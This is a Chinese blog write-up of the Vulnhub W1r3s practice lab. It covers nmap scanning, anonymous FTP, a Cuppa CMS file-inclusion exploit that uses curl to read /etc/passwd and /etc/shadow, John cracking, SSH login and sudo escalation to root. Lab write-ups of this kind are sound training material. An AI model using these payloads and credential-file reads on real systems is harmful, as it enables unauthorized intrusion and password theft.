靶场笔记-Vulnhub w1r3s

W1r3s靶场笔记

一、常规nmap扫描

  1. sudo nmap -sn 192.168.160.0/24,经过两次扫描,确定192.168.160.174为靶机ip
    在这里插入图片描述

  2. sudo nmap -min-rate 10000 -p- 192.168.160.174

    扫描发现开放4个端口
    在这里插入图片描述

  3. sudo nmap -sT -sV -O -p21,22,80,3306 192.168.160.174,扫描服务信息

  4. sudo nmap --script=vuln -p21,22,80,3306 192.168.160.174,扫描漏洞

二、尝试FTP匿名登录

  1. sudo ftp 192.168.160.174,尝试anonymous匿名登录

    在这里插入图片描述

  2. 下载ftp服务的一些有用文件进行分析

  3. 发现02.txt文件有些编码文件,尝试识别破解

    sudo hash-identifier ‘01ec2d8fc11c493b25029fb1f47f39ce’

    在这里插入图片描述

  4. 发现employee-names.txt 文件内容为员工姓名,可能有用,其他文件暂无有用信息

三、80端口web渗透

  1. 常规扫描一波目录

    sudo feroxbuster -u ‘http://192.168.160.174/’ -w top7k.txt

    发现cuppa cms和WordPress

    在这里插入图片描述

  2. 搜索历史漏洞,发现cuppa cms有个文件包含漏洞,尝试利用:
    在这里插入图片描述

  3. 下载payload文件

    payload:http://target/cuppa/alerts/alertConfigField.php?urlConfig=…/…/…/…/…/…/…/…/…/etc/passwd

    利用为:http://192.168.160.174/administrator/alerts/alertConfigField.php?urlConfig=…/…/…/…/…/…/…/…/…/etc/passwd

  4. 将读取到的文件通过curl编码导出为文本(payload文件提到可能需要将url部分编码才能正常读取)

    sudo curl --data-urlencode urlConfig=…/…/…/…/…/…/…/…/…/etc/passwd http://192.168.160.174/administrator/alerts/alertConfigField.php | html2text

  5. 读取shadow文件

    sudo curl --data-urlencode urlConfig=…/…/…/…/…/…/…/…/…/etc/shadow http://192.168.160.174/administrator/alerts/alertConfigField.php

  6. 将读取到的hash值保存,使用John破解

    sudo vim hash

    john hash 在这里插入图片描述

  7. 利用破解的账号密码进行ssh连接,获取基础权限shell

    sudo ssh w1r3s@192.168.160.174

    在这里插入图片描述

四、提权

  1. 运行sudo -l查看当前用户权限,发现是所有权限

    在这里插入图片描述

  2. 提权

    可以用sudo创建一个新终端或者反弹一个shell,都是具有root权限
    在这里插入图片描述

五、获取flag

在这里插入图片描述

  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值